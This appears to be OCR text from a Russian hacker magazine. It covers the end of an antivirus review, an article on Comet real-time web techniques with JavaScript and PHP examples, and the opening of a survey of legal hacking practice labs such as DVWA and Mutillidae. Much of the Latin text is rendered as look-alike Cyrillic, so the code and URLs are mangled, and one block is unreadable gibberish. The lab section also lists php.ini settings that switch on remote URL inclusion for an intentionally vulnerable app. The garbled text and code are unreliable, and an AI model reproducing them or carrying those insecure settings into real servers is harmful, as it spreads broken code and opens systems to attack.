НТТР-трафика, я посерфил несколько сайтов 
из списка ѵѵѵѵѵѵ. гпаЬл/агеигЕсогп. что сразу же 
вызвало сигнал тревоги: БрЮег ОаТе ругался 
на Тгате'ы и зловредные Ч5-скрипты. 

Ранее я говорил, что вся корреспонденция 
почтовых серверов Яндекс проверяется как 
раз решением на базе Ог.ѴѴеЬ, и аналогичное 
решение доступно и домашним пользова- 
телям. Почтовый монитор БрЮег Маіі про- 
веряет сообщения на вирусы до того, как они 
попадают в почтовый ящик. А модуль «анти- 
спам» неплохо распознает рекламные письма 
как на русском, так и английском языках, 
и при этом порадовал низким количеством 
ложных срабатываний. 

БЫТЬ ИЛИ НЕ БЫТЬ? 

Если хочешь краткий вердикт, то Ог.ѴѴеЬ 
БесигіТу Брасе Рго оказался более чем рабо- 
тоспособным решением. Привыкнув к тому, 
что антивирусы не всегда могут распознать 
даже распространенную малварь, но хорошо 
закриптованную, было приятно увидеть, что 
«веб» справился с обнаружением многих 
серьезных руткитов. В общем, рекомендую 
попробовать продукт: демо-версию ты най- 
дешь на диске, т 
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Технологии для построения РеаШте 

РЕАЛ-ТАИМ ~ 

В ВЕБЕ 



Технология Сошеідля построения 
быстрых веб-приложений 



Когда-то веб состоял только из статических страничек. Позже появились дина- 
мический контент и технология АШ, позволяющая частично обновлять содер- 
жание страниц. Но для реализации приложений, работающих в реальном вре- 
мени - онлайн игр, биржевых программ, отдельных частей социальных сетей, 
- этого оказалось мало. На свет появилась технология СотеЕ 



еб-приложения, как и обычные 
сайты, начинались как статические 
НТМІ_-ки с формой для ввода неко- 
торого запроса, при этом пользо- 
ватель сам должен был переходить 
по ссылкам, чтобы обновить информацию. 
Теперь все иначе. Каждый хочет, чтобы 
информация приходила к нему сама, причем 
в самый момент ее появления. Ждать или 
того хуже нажимать на рефреш в ожидании 
обновления уже неприемлемо. Если пришло 
сообщение в социальной сети, этот факт тут 
же должен отобразиться в открытой странице 
браузера. Помимо этого, начался поголовный 
перенос софта в веб-окружение, предъявляя 
к веб-приложениям требования обычных 
десктопных программ. Для веб-приложения, 



работающего с финансовой биржей, задержки 
неприемлемы, и, чтобы обойти массу ограни- 
чений, используется технология СотеЕ 

ЭТО НЕ АШ 

Это не чистящий гель, но он также может 
навести блеск, правда, не на кухне, а в вебе. 
Если кратко, то СотеТ — это набор приемов 
и средств, позволяющих быстро обновлять 
данные в браузере (страницы и их элементы] 
без участия пользователя. От клиента требует- 
ся только зайти на ресурс — с этого момента 
сервер сам будет отправлять браузеру новые 
данные, если для него есть какая-то новая 
информация. Сразу хочу обратить внимание 
на ключевое отличие от А^Х, который запу- 
скается только в том случае, если надо отпра- 



вить данные, и завершает свою нелегкую тру- 
довую жизнь сразу после получения ответа. 

К сожалению, создание запроса через А^Х 
— это всегда дорого и долго, да и браузер 
выкидывает свои штучки, ограничивая коли- 
чество одновременных соединений. Правда, 
А^Х — это самое родное для веба, потому 
как работает он точно так же, как и НТТР- 
протокол, по схеме запрос-ответ. Совсем дру- 
гое дело — СотеЕ которому для реализации 
всех своих возможностей, приходится при- 
бегать к различным извращениям, имитируя 
постоянное соединение. 

Ключевой момент СотеСа заключается 
в том, что не клиент (браузер), а сервер 
решает, когда надо отправить пользователю 
данные — такой подход называется зегѵег- 




► 028 
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Так работает обычный АМХ сайт, 
т.е. почти любой Веб 2.0 сайт 

ризб. Самым первым вариантом применения 
такого подхода стали чаты: новые сообще- 
ния появляются мгновенно, страница не 
обновляется — полное впечатление обычного 
приложения. Конечно, аналогичную функцио- 
нальность давно можно реализовать через 
РІазЬ , но черт бы побрал этот флеш — он тор- 
мозной, глючный и закрытый. Да и если ты 
запрограммировал свое супер-творение на 
технологии АЧАХ, то включать туда совершен- 
но инородное тело Ріазб, работать с которым 
мороки не оберешься, никак не хочется. А 
Сотеі позволяет обойтись обычными про- 
стыми средствами — ЧаѵаЭсгірІ + НТМІ_, 
получая при этом мгновенность обновлений 
и простоту. 

РАЗБИРАЕМ ПО КИРПИЧИКУ 

Так как же удается Сотеі’у мгновенно 
обновлять информацию у тебя в браузере? 

Ты, наверное, знаешь, что основным мето- 
дом работы с сервером в веб-приложении 
является объект ХМЫНирРециезТ который 
позволяет ЧаѵаЭсгірЕу соединяться с сер- 
вером, передавать и получать информацию. 
Принцип действия аналогичен классическому 
НТТР-протоколу: ты запрашиваешь ШИ и 
получаешь ответ. Поэтому, чтобы через АЧАХ 
сделать обновляемый список контактов со 
статусами (онлайн/офлайн), необходимо по 
таймеру, раз в 10 секунд, регулярно соеди- 
няться с сервером и запрашивать список 
тех, кто онлайн. Это существенная нагрузка 
на клиентский браузер, не говоря уже о 
самом сервере: каким бы мощным он ни был, 
выдержать нагрузку тысяч людей, каждый из 
которых будет отправлять такое количество 
запросов, скорее всего ему не удастся. Да, 
чем больше интервал опроса, тем меньше 
нагрузка. Но сегодня никто не хочет мириться 



с задержками: мало кому приятно отправ- 
лять сообщения пользователю со статусом 
«Онлайн», когда он давно убежал на речку, а 
статус банально не успел обновиться. Короче 
говоря, обычный и так привычный нам АЧАХ 
тут уже не подходит. 

Существуют два основных подхода реализа- 
ции СотеПа. Классическая схема (называ- 
ется бопд-роШпд, длинный опрос] выглядит 
так — ты подключаешься к серверу и ждешь, 
пока не появятся данные. То есть твой скрипт 
обращается к серверу и говорит: «Когда у 
тебя будут данные, я их сразу заберу, а потом 
снова подключусь». В некоторых реализаци- 
ях сервера существует буферизация, когда 
сервер не сразу отдает данные, а ждет: вдруг 
сейчас появится что-то еще, тогда отправлю 
все сразу. Но такая буферизация вредна, так 
как вносит задержки, а мы хотим достичь 
максимальной скорости! После получения 
данных браузер должен снова открыть 
новое соединение. Длительность такого 
соединения может измеряться часами, но 
это в теории. Обычно время намного мень- 
ше и максимум достигает 5 минут, после 
которых просто создается новое соедине- 
ние. Делается это потому, что серверы не 
любят такие долгоживущие сессии, да и сам 
протокол НТТР не очень приспособлен к тако- 
му использованию. 

Другой подход называется стримингом 
(Эігеатіпд) и означает, что соединение не 
обрывается после каждого сообщения, а 
остается открытым. В результате, единожды 
подключившись, клиент начинает получать 
новые и новые сообщения без каких-либо 
задержек. Конечно, периодически приходится 
переподключаться, чтобы очистить браузер от 
устаревшей информации, да и серверу дать 
передохнуть, но время соединения здесь уже 
измеряется часами против секунд, максимум 
минут в случае 1_опд-роШпд’а. Такой подход 
значительно сложнее и, как правило, требует 
специального сервера. Сложность, как всег- 
да, проявляется в мелочах — например, как 
определить, что соединение не оборвалось, 
а у сервера просто нет для тебя данных? А 
как масштабировать свою систему? Если 
обычные НТТР-запросы можно раскидывать 
на несколько серверов через балансировщик, 
то с такими долгоживущими соединениями 
алгоритмы должны быть значительно слож- 
нее. Словом, у каждого из подходов есть свои 
плюсы и минусы. 

КОМЕТА ИЗНУТРИ 

Чтобы понять, как устроен Сотеі, предлагаю 
написать реал-тайм приложение на прак- 



Реализация СотеГа через Бігеатіпд 




АІэх ѵгеЬ аррііыіюп тосШ (эьупсЬгопоіл) 




Соте’ ѵѵеЬ арріісаііоп тойві 

свет 




Диаграммы состояний для обыч- 
ного Аіах'а и Сотеі-соединения. 
Найти 10 отличий. 



тике: сервер и клиент. Простейший вариант 
реализации — скрытый бесконечный фрейм 
(ЫсИеп Итате]. Это самая старая и самая 
«хакерская» реализация СотеСа, ведь никто 
при создании НТМИ-а не думал, что появится 
необходимость получать данные мгновенно. 
Работает он так: браузер создает невиди- 
мый тег <Итате>, указывая ему адрес твоего 
комет-сервера. Сервер при поступлении 
запроса отвечает кусочками НТМЕ-кода: 
например, посылает код ЧаѵаЗсгірІ, который 
выполняется сразу, как только его получает 
браузер. Фишка в том, что отправив данные 
в первый раз, сервер не закрывает соедине- 
ние, а ждет какое-то время, а потом снова и 
снова отсылает новый скрипт. В итоге данные 
постоянно обновляются, но тут проблема: 
браузер-то не резиновый. Через некоторое 
время в нем накапливается куча элементов 
<зсгірІ>, поэтому фрейм необходимо периоди- 
чески удалять. На сервере также не все глад- 
ко, потому как на нем крутится настоящий 
бесконечный цикл. 

Даже если никаких полезных данных не 
поступает, сервер все равно должен перио- 
дически посылать что-то вроде пинга, говоря 
клиенту: «Я сервер, все ОК». Если же связь 
оборвется, узнать это будет затруднитель- 
но, поэтому сервер гарантированно каждую 
секунду посылает тег <зсгірІ>, в котором 
вызывает функцию, сбрасывающую предыду- 
щий таймер и запускающую новый отсчет. 
Таймер настроен таким образом, чтобы сра- 
ботать через 5 секунд (значение может силь- 
но варьироваться]. Если от сервера за это 
время ничего нет, таймер сработает и удалит 
фрейм, пробуя заново установить соедине- 
ние. Если же сервер нормально отвечает 
каждую секунду, то таймер никогда не выпол- 
нится, а, значит, с соединением все хорошо. 
Вот пример такого клиента (с использовани- 
ем 45-библиотеки іСіиегу]: 
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ДА ЗДРАВСТВУЮТ ѴѴЕВЗОСКЕТЗ! 




Реализация Ьопд-Роііпд 



ѴѴеЬ Зоскеіз АРІ 

іглегіасе ИеЬЗоскес I 
// геасіу зіахе 

// пе^иогкіпд 

агі:гіЬиі:е Еѵеп^Ьізнепег опореп; 
аНіігіЬііііе ЕѵепИЬіаііепег оптеззаде; 
аНІігіЪиТе ЕѵегЩЬізІіепег опсіодео; 
ѵоігі розі;Меззаде ( іп ООМЗігіпд сіа^а); 
ѵоій Зізсоппес^ { ) ; 

}; 

ѴѴеЬБоскеІз, или последняя 
надежда на человеческий веб в 
лице НТМІ_ 5 

ѵаг еггог_Ьітег_ісІ = пиіі; 
іипсСіоп еггог_і^гате ( ) 

{ 

$ ( ' #сотеД_і:Егате_рапе1 ' ) . 
етрСу ( ) . аррепсі ( ' <і^гате 
згс= " сотеС . сіотаіп . сот/сотеС . 
р!ір?изег_іс1=1 " ></і^гате> ' ) ; 

} 

іипсСіоп сотеР_ріпд ( ) 

{ 

сіеагіпрегѵаі (еггог_Ьітег_іс1) ; 
зеСІпСегѵаІ ( іипсСіоп ( ) { еггог_ 
Іігаше ( ) ; }, 5000); 

} 

іипсСіоп сотеС_пем_теззаде (тзд) 

{ 

$ ( ' #сотеЦ_тзд_сопСепЦ ' ) . 
аррепсі (' <с!іѵ> ' + тзд.Сіте + ': * 

+ тзд.СехС + ' < /сіі ѵ> ' ) ; 

сотеР_ріпд ( ) ; 

} 

Сервер, реализующий бесконечный цикл, при 
этом может выглядеть следующим образом (в 
реализации на РНР): 

$РішеоиР = 1000; 

$гиппіпд = Ргие; 
вдМІе ($гиппіпд) 

{ 

$шзд = 1 {Ріте : ' . сіаРе ( 'ш: з 1 , 

Ріте {)).', СехР : "Зегѵег зауз : 

ОК ! " } ' ' ; 

есію ' <зсгірР>сотеР_пеѵ7_ 
шеззаде ( ' . $тзд . ' ) ; </зсгірЦ> ' ; 
изіеер ( $СітеоиС ) ; 

} 

Это одна из самых простых реализаций 
СотеЕа, но от этого и обладающая рядом 



недостатков. Иногда бывают проблемы с 
различными прокси-серверами и буфериза- 
цией. Так как порции данных обычно очень 
маленькие, некоторые прокси или браузе- 
ры будут ждать, пока не накопится нужное 
количество данных, и лишь потом будут 
передавать все скопом. Нам это не подходит. 
Обычно дело решается добавлением пробе- 
лов до или после сообщения, но трафик при 
этом неизбежно возрастает, а дгір-сжатие 
в такой реализации СотеЕа невозможно. 
Вторая сложность — это нагрузка на сер- 
вер, постоянные опросы базы данных или 
кэша, а также сложность масштабирования. 
Неприятно и то, что в браузере постоянно 
будет висеть индикатор загрузки страницы, 
пока открыт такой іітате. Зато этот способ 
очень быстрый и зависит в основном от 
работы сервера и того, с какой частотой осу- 
ществляется на нем цикл опроса. 

Сделать механизм передачи по методу І_опд- 
роШпд еще проще — клиентская часть на 
ЭаѵаЗсгірІ: вообще может быть миниатюрной: 
например, в )0иегу это всего одна строка: 

$ . деДЦзоп ( 'іЩЦр : / /сошеС . сіотаіп . 

сот/сотеС . ріір ' , іипсСіоп ( гезропзе) 

{ } ) ; . 

Сервер немного сложнее, чем в предыду- 
щем варианте: вместо бесконечного цикла 
мы ожидаем первого сообщения, а после 
отправки ответа сразу закрываем соедине- 
ние, завершая скрипт. Заметь, что возвра- 
щать можно как 550ІЧ, так и любой другой 
тип данных, доступный для обработки через 
обычный А5АХ. 

ДОЛОЙ ВЕЛОСИПЕДЫ, 

ДАЕШЬ АВТОМОБИЛЬ! 

Немного помучившись, ты сможешь напи- 
сать простейшую Сотеі-систему на любом 
языке, использующую любую технологию 
передачи данных. Но все эти самоделки едва 
ли впишутся в нормальный сайт. Копаться в 
дебрях ЭаѵаЗсгі рі и добиваться корректной 
работы во всех браузерах — занятие весьма 
муторное. Но! Есть готовые к внедрению 
решения. Я не буду говорить про коммерче- 
ские серверы для СотеЕа: они, как правило, 
применяются в биржевом софте и стоят соот- 
ветствующих денег (например, стоимость 
ЕідЫзІгеатег начинается от 50 тысяч долла- 
ров]. Наряду с платными решениями широкое 
распространение получили готовые открытые 
проекты, в рамках которых разработчики уже 



Стандарт НТМИ 5 уже успел намозолить 
глаза, обещая сказочные возможности, 
но неизвестно когда и как. Но одна штука 
в нем есть уже сейчас — веб-сокеты. Это 
немного не те сокеты, о которых принято 
говорить в традиционных языках про- 
граммирования, но они достаточно близки 
к ним. 

По сути, ѴѴеЬЗоскеІз — это расширение 
стандартного НТТР-протокола, которое 
позволяет устанавливать двухстороннюю 
асинхронную связь между клиентом (брау- 
зером) и сервером без ограничения на 
тип передаваемых данных. 

Начинается все обычным образом: брау- 
зер посылает серверу специальный НТТР- 
СЕТ запрос, но дальше... Если сервер 
согласен установить запрошенный вид 
подключения, то он отправляет браузеру 
клиента специальный флаг и оставляет 
ТСР-соединение открытым! В результате 
имеем обычный ТСР-сокет с сервером, 
правда, поверх НТТР-протокола. Если 
одна из сторон хочет что-то передать, 
она просто пишет в открытый канал свои 
данные, кодируя их в обычную строку 
ІЭТЕ-8 (отмечая начало и конец порции 
данных шестнадцатеричными флагами) 
или посылая напрямую бинарные данные. 
Наконец-то можно будет избавиться от 
всех ограничений А5АХ и извращений 
СотеЕа. 

На текущий момент, единственным брау- 
зером, поддерживающим веб-сокеты, 
является Ооодіе СЬготе. Самые нетер- 
пеливые могут опробовать веб-сокеты в 
действии, правда, с помощью довольно 
костыльного решения. Я говорю о библио- 
теке ѵѵеЬ-зоскеНз (. 

- із ] . которая имитирует АРІ, 
согласно текущему проекту стандарта, 
а внутри работает через Е Іа з б -объект, в 
котором есть реализация полноценных 
сокетов, хотя и с многими ограничениями. 

написали серверные и клиентские части, 
а также приделали к ним АРІ, чтобы можно 
было легко встраивать в любой проект. Это 
СотеЫ ( сотеісі.огд ]. НТТР_Ризб_Моби[е 
( ризбтосІиІе.зІасЕпеІ: ). АРЕ ризб епдіпе ( ѵѵѵѵѵѵ. 
аре-рго]есЕогд ). Я же хочу рассказать тебе о 
проекте от известного разработчика Дмитрия 
Котерова, создателя Эепѵѵег’а, социальной 
сети Мой Круг и русского твиттера Рутвит. 
Сервер 0к1аЬ_Реа Іріехог написан на Регі и, 
по заявлению автора, готов к промышленной 
эксплуатации с десятками и сотнями тысяч 
клиентов одновременно. Пока реализована 
только модель Іопд-роШпд, но в отличие 
от многих других решений, автор позабо- 
тился о простых людях, предоставив сразу 
библиотеки для ЭаѵаЗсгірІ; и РНР. На сервере 
тебе достаточно только подключить один 
РНР-файл и создать объект сервера, далее 
можно публиковать сообщения в каналы, 
чтобы передавать клиентам данные. С другой 
стороны, на веб-странице достаточно под- 
ключить только небольшой 55-файл и под- 
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Что же лучше? Все зависит от ситуации. Если собы- 
тия, о которых тебе надо оповещать пользователей, 
происходят достаточно редко (например, сообщения 
о входе/выходе юзера, мессаги чата или новости), 
то Еопд-роШпд позволит сделать все быстро и легко 
с минимальными сложностями. Даже обычный сла- 
бенький сервер сможет обслуживать тысячи таких 
пользователей одновременно, а чтобы запрограмить 
такое на ^ѵаЗсгірІ, потребуется всего ничего — 
несколько строчек кода и любая из А^Х-библиотек. 
Если же таких событий происходит очень много, и 
время между двумя событиями меньше, чем тратит 
клиент на то, чтобы вновь присоединиться к серве- 
ру, значит, тебе необходим стриминг. Иначе, полу- 
чив первое сообщение, браузер клиента напрасно 
отключится, чтобы тут же заново подключиться и 
забрать новую порцию данных — и так будет повто- 
ряться вновь и вновь. Это крайне негативно скажет- 
ся на быстродействии браузера. С помощью же стри- 
минга, один раз подключившись, можно обработать 
столько информации, сколько будет на этот момент 
данных — и все в рамках одного подключения. 

Именно поэтому все Сотеі-серверы для биржевых 
порталов работают именно на базе стриминга, ведь 
курсы валют могут поменяться несколько десятков 
раз за время, пока браузер соединится с сервером! 

писаться на интересующие каналы, определив функцию 
саІІЬаск, которая выполняется при поступлении данных. 
Сервер внутри имеет собственную очередь сообщений, 
поэтому данные клиенту доставляются точно в той после- 
довательности, как были отосланы, даже в случае потери 
связи или перехода на другую страницу сайта. Радует 
также удобная возможность одной командой получить 
список всех пользователей онлайн (тех, кто слушает 
каналы сервера) или изменения этого списка с момента 
последнего опроса (если у тебя тысяча пользователей, то 
лучше всего отслеживать изменения, а не получать весь 
список заново). 

Давай на примере этого решения напишем простейшую 
систему обмена мгновенными сообщениями между поль- 
зователями на сайте. Сообщение пользователя отправ- 
ляется на сервере обычным А^Х'ом, а вот доставкой 
занимается уже СотеС Код отправки мы опустим — это 
слишком просто (смотри исходники). Намного интереснее 
посмотреть на сервер, который мы напишем на РНР: 

//рассылаем сообщение всем пользователям, 
которые сейчас на сайте 
іпс1исіе_опсе ( ' БкІаЪ/КеаІрІехог . рЬр ' ) ; 
//подключаемся к серверу для отправки сооб- 
щений 

$бк1аЬ = пеѵі Бк1аЪ_Кеа1р1ехог ( " 127 . О . О . 1 " , 
"10010", "хакер_" ); 

//10010 — специальный порт для приема сооб- 
щений к отправке 

//хакер_ — префикс для каналов, чтобы один 
сервер мог обслуживать разные проекты 
$_Ьо = Аггау ( ' а11_оп1іпе ' ) ; //массив кана- 
лов , куда нужно отправлять сообщение . В 
этом случае используется общий канал, кото- 
рый слушают все пользователи, которые на 
сайте 

$_шеззаде = Аггау ( 1 РехБ ' => 'Привет от жур- 
нала Хакер!', ' аибЬог ' => 'Вася', ' біше' => 

б іше ( ) ) ; 



//это сообщение, которое в виде БЗОЫ- 
объекта будет передано всем пользователям 
$бЫаЬ->зепб ( $_бо , $_теззаде) ; 

//сообщение отправлено! 

Код на ЭаѵаЗсгі рі с клиентской стороны, который прини- 
мает сообщения, не сильно сложнее: 

//создаем подключение к серверу 

ѵаг сотеб = пеѵі Бк1аЬ_Кеа1р1ехог ( ' Ьббр : / / 

грі . ботаіп . сот 1 , ' хакер_ 1 ) ; 

//сервер требует обязательной работы на 
поддомене 

//теперь подписываемся на канал, чтобы 
получать все отправленные в него сообщения 
сошеб . зиЬзсгіЬе ( " а11_оп1іпе" , бипсбіоп (тзд, 
іб) { 

/ /этот метод будет выполнен для каждого 
полученного сообщения 

//іб — это внутренний уникальный иденти- 
фикатор сообщения 

$ ( 1 #сошеб_шзд ' ) . аррепб ( ' <біѵ><±» ' + пеѵі 
Бабе (тзд . біте * 1000 ) . боБосаІеЗбгіпд ( ) + 

' </Ь> ' + тзд.аиббюг + ' : * + тзд.бехб + 

' </біѵ> * ) ; 

//обрати внимание, что ты на сервере 
отправил обычный РНР-массив — на странице у 
тебя ѵТЗОМ точно такой же структуры 
})? 

соте . ехесибе ( ) ; //после определения подписок 
приказываем слушать их 

//подписываться и отписываться можно в 
любой момент, необходимо только вызвать 
сотеб . ехесибе () , чтобы уведомить сервер 
//все, не хотим получать сообщения 
сотеб . ипзиЬзсгіЬе ( ' а11_оп1іпе ' ) ; 

ЗДЕСЬ И СКАЗКЕ КОНЕЦ 

Соте! позволяет создать постоянное соединение между 
страницей в браузере и веб-сервером и напрямую обме- 
ниваться информацией. При этом сервер сам решает, 
когда послать данные, а страница получает их с той же 
скоростью, как возникают события. Несмотря на всю мощь, 
использовать Соте! очень просто, особенно если взять на 
вооружение готовые проекты вроде ОкІаЬ_РеаІрІехог. При 
этом решение получается по-настоящему быстрым. Поверь, 
реализация чата на базе ОкІаЬ_РеаІрІехог работает стой 
же скоростью, а иногда и быстрее, чем чат в ЕасеЬоок'е. 

С приходом НТМбб в браузерах будет родное решение — 
бинарный протокол, упакованный в стандартный НТТР, 
который обеспечит максимальную скорость обмена данны- 
ми, что важно, например, для интернет-биржи или аукцио- 
на, где новые ставки могут появляться десятками в секунду. 
Но когда же это будет? На данный момент Соте* — это 
единственный выход, если ты строишь веб-приложение, 
работающее в реальном времени. лг 




> іпіо 



Всегда созда ва й дл я 
СотеЕа отдельный 
поддомен, например, 
соігіебботаіп.соіті.так 
какбраузеры не моіуг 
создавать параллельно 
более 2-6 соединений с 
одним доменом, а если 
на странице сдесяток 
картинок, скриптов и 
стилей, лимит соеди- 
нений будет исчерпан. 
Подключения на поддо- 
мен считаются отдельно. 




НТТР://ѴѴѴШ 

■ Г 

> Ііпкз 

• Подробнее о веб- 
со кетах: 

ѵѵеЬзоскеІз.гиАесЬ/ 

іпіго 

• Хорошая вводная 
статья об А^АX-е: 
ІаѵазсгірЕги/аіах/іпіго 

• Фреймворки для 
реализации веб- 
приложений в реаль- 
ном времени: 

^ѵа — аітозрбеге.сіеѵ. 

Іаѵа.пеЕ 

.МЕТ — уууууу. 

кшептоипФіп.сот : 

РѵіЬоп — огЬіІесІ.ога ; 

РиЬѵ — щддегпаиб 

гибѵіюгде.огд : 

РНР — діФиЬ.сот/ 
какзегрот/рбрсіаетоп . 



<? 

//рассылаем сообщение всем пользователям, кто сейчас ва сайте 
іпсіийеопсе ( ); 

//подключаемся к демону серверу для отправки 

$сі1г1аЬ = пеѵ Ок1аЬ_Ееа1р1ехог ("127.0.0 Л", "10010", "ха1гер_"); 

//10010 - специальный порт для приема сообщений к отправке, 

/ /хакер _ - префикс для каналов, что - бы один сервер обслуживал разные проекты 

$_ю Аггау ( ); //массив каналов, куда отправить сообщение. В зтом случае - общий канал, который слушают 

все пользователи, которые на сайте. 

$_теззаде Аггау ( 1 , -> , ■> сіте()); 

//это сообщение, которое а виде ^5Ш-обьеxта будет передано всем. 

$<1ЫаЪ->зеп<і($_со, $_теззаде) ; //вуаля, сообщение всем отправлено 1 
?> 



Серверная часть нашего чата 
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Легальный взлом. Можно ли заниматься любимым делом и прокачивать свои 
навыки в пентесте, не нарушая закон? Где можно проводить инъекции и экспе- 
риментировать со сплоитами, не думая о том, включен ѴРЫ или нет? Как опробо- 
вать полученные знания, пробравшись от бага в скрипте до самого рута в систе- 
ме? Способ есть! 



Нас часто спрашивают: «Как научиться взло- 
му?». Ответ прост: так же, как и любому дру- 
гому предмету. Сначала ты глубоко и вдумчиво 
изучаешь теорию, затем приступаешь к прак- 
тике. Разница лишь в том, что для изучения, 
скажем, математики полно готовых задачников 
для тренировки, а для взлома — их вроде 
бы и нет. «Как это нет? А любая шароварная 
программа, любой ресурс в Сети — чем не 
площадка для взлома?» — возмутишься ты. 
Это, конечно, вариант. Только, во-первых, 
начав эксперименты в подобном ключе, ты 
имеешь все шансы их быстро и закончить. А, 
во-вторых, не имея за плечами даже мини- 
мального опыта, сразу брать быка за рога, 
пытаясь анализировать серьезные ресурсы 
— все равно что бросаться на амбразуру. 
Занятие, мало того, что опасное, но еще и 
бестолковое. Есть вариант лучше! 

Многие компании, занимающиеся обуче- 
нием специалистов по информационной 
безопасности, готовят всевозможные кейсы. 

Те же самые задачки по математике, но только 
в контексте пентеста. Аналогичные решения 
предлагают и просто энтузиасты, демонстри- 
руя на них различные приемы взлома. За 
основу часто берут старые версии известных 
продуктов, в которых полно неисправленных 
уязвимостей, иногда такие квесты пишут 
с нуля — так или иначе, в них намеренно 
встроили баги, которые можно удачно эксплу- 



атировать. Некоторые из площадок хостятся 
прямо в Сети, предлагая пройти своеобразный 
][-квест (такой, как наш, гіпдОсир.ги], другие 
предполагают установку на свой собственный 
веб-сервер, третьи распространяются в виде 
образа виртуальной машины — ее просто надо 
запустить. Во всем разнообразии этих проек- 
тов нам сегодня и предстоит разобраться. 

РАІМ ѴЮЕРАВІ.Е ДОЕВ АРР 

Обычно создатели веб-приложений всячески 
хвастаются высокой надежностью свого про- 
дукта, кичатся встроенным ѴѴАР (файрволом 
для веб-приложений] и стыдливо отшучива- 
ются, если в их сценариях находят очередной 
баг. Разработчики Оатп ѴиІпегаЫе ѴѴеЬ Арр, 

Чертовски уязвимое веб- 
приложение 

ШѴША 



ОаІаЬаэе зеіир Ч 




напротив, категорически заявляют, что уста- 
новка на живом веб-сервере неприемлема, 
потому как приложение... «чертовски уязви- 
мо» :]. Все самые распространенные ошибки 
горе-программистов собраны в одном месте, 
чтобы ты смог потренироваться на проведении 
самых разных атак. В качестве платформы 
выбрана наиболее популярная связка РНР/ 
МуЗСіИ, по этой же причине мы начинаем 
наш обзор именно с ЭѴѴѴА. Если хочешь 
сэкономить время на настройке веб-сервера, 
все отлично заведется на готовых сборках: 
йепѵѵег'е ( ѵѵѵѵѵѵ.сіепѵѵег.ги ) или ХАМРР'е ( ѵѵѵѵѵѵ. 
арасбеІтіепбз.огд/хатрр-еп.ЬітІ- І. Собственно, 
необходимо лишь распаковать файлы в 
риЫіс Ы:тІ- каталог и обратиться в браузере 
к ЬНр://127.0.0.1/сІѵѵѵа/іпсІех.рІ~ір . Не придется 
даже ковыряться с ручным созданием базы: в 
меню есть кнопка «Сгеаіе / Резеі; ОаіаЬазе». 
Но если все же захочется что-то подкрутить, 
то это можно сделать в конфиге /сопбд/сопбд. 
іпс.рбр. Еще один момент касается настройки 
РНР: надо убедиться, что в РНР.іпі внесены 
все изменения. 

шадіс_диоСез_дрс = Об:Е 
а11оѵ^_иг1_Рореп оп 
а11оѵ^_иг1_іпс1и<іе оп 

Проект постоянно обновляется, а в конце 2009 
года он был даже приобретен инвесторами, 



► 032 
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МиНПМае; Паск, Ьеагп, 5есиге, Наѵе БЧіп!!! 

Ѵои нг с Іо^сіі ш а$ сіа 



Лсііі Іо уоиг Ыо“ 

ХѴЛдада (в уоцгЫгц. к*ѵе щ Чйгу І.0ДО. ЯТ«П*І ІЧ Ьйгі Ді 'юоздмчн': 



ДІ - Слн* ЙіГв Зспрйиі 




,У - іпікііп Ні4гс 
(5^1 пші СптгиэиіІІ 



І4СЫЛ 



Рі >1 Х'ѵііліЯ н иду йі# ІШ ода рЬогп '1 оЯюй і гік-гіі-4 (ірщ МЧ 4? 1*чА( ЯШздИИ НѴЗ Чода4 Сдлтеода кт пв кеше і Ііьи р даоЦкт ВЯ> Пн* т« йе ИЯ* 
4хеЬак) іадр’" іа И» -сіаміс, Ьм іЬнс яс Гя тис іжгниі ііші^ да «кнікі «Іо ийвеЬ Т рім іІ»№ я в іі4» Імн Р# кш Ьм млЬк 

дЕгЯ&пЁ пЯйщ Ву іЪгшЯІті 1кг 

ан№ 

»РГ *1Чб« і > - *«** м М** ? '/•**« *«/*а**41 «Ьфкіі»' »яЭе$а*ІЭД [«№ЧМ,«»ХіІІі 

Г/ 



Рм С$ИР:Й. ѵйч да Ригч 4о И стсйе «дай іч рвф« «л4 пик* * Ьй іе вд «ир Ни* и ай « сод* Ѵев *рцИ1 № иатпЫщ 1кг Ни (оіеиод 

<жп| нс^Тир. кКнІЬбМ ипйШаг сгісл р^ТцйЦс-агікІ-С^і-ідПи -кійЕ ідЬрІйірдЛ. &йш ..Ьтт^Ы" ^ОіЬсгс' ^<кшлЛЕ;.1»у‘> 

ТЫі іі Оіг гму уі-яу м (к> СЕКТ ѵ.-Шп ІЬ: ОЕ Т таяіЬмІ .Іші Іорт и Догоняй, п^ікг унж ра$г тЯгкЬ [к Бгік пВДс книгр1к« сЬг. ям! Они тог к V™ іНсчМ іилѵ иг 




Рай для тех, кто только начинает пробовать свои силы в 501 \п]/Х55 



так что вполне возможно, что вскоре нас ждут 
серьезные улучшения. 

МІЛІШОАЕ 

Автор этого проекта поначалу собирался 
снять для новичков видеоуроки по пенте- 
сту веб-приложений с объяснением основ 
пентеста. Когда же дело дошло до поиска 
подходящей платформы для демонстрации 
различных типов уязвимостей, автор попал 
впросак. Подходящей платформы попросту 
не нашлось: большинство решений оказа- 
лись слишком сложны для объяснения азов 
новичкам, только начинающим знакомство с 
проблемами безопасности веб-приложений. 
Так и родился проект МибШбае. Автор взял 
список из десяти типов уязвимостей 0ѴѴА5Р 
Тор 10: 5С11_-инжекции, Х55, С5ВЕ и так далее 
— и написал скрипты так, чтобы желающий 
мог попробовать свои силы в эксплуатирова- 
нии каждой из них. Код намеренно написан 
очень просто, чтобы облегчить понимание 
сути уязвимостей. Как и ОѴѴѴА, проект легко 
устанавливается под виндой и туксом даже 
на ХАМРР-сервере, а необходимые базы 
данных создаются с помощью опции «Зеіир/ 
тезе! ІЬе йВ» из главной страницы проекта. 
Автор предлагает последовательно читать 
информацию о каждой уязвимости из 0ѴѴА5Р 
Тор 10 [ ѵѵѵѵѵѵ.оѵѵазр.огд/іпбех.рЬр/ОѴѴАЗР 
Тор Теп РгецесП и, разобравшись в вопросе, 
пробовать свои силы на МиОШбае. Если экс- 
плуатация тебе удалась, то во второй части 
квеста баг надо пофиксить. 

ѴѴЕВВОАТ 

Когда автор МиОШбае говорил о том, что 
многие из хакерских квестов не подходят для 
новичков, он имел в виду, в том числе, раз- 
работку ѴѴеЬбоаТ Проект примечателен тем, 
что развивается в рамках уже знакомого про- 
екта 0ѴѴА5Р (Ореп ѴѴеЬ Арріісабоп ЗесигКу 
Ргоіесі:], под эгидой которого выпускается 
большое количество веси гТу-ути лит. Но если 
два предыдущих проекта предлагают играться 
с РНР-приложениями, то здесь ты столкнешь- 
ся с кодом, написанным на баѵа. Для хостинга 
б2ЕЕ-приложений используется стандартный 



ЬаЕ Для этого в системе должен быть установ- 
лен свежий 62 ЕЕ. 

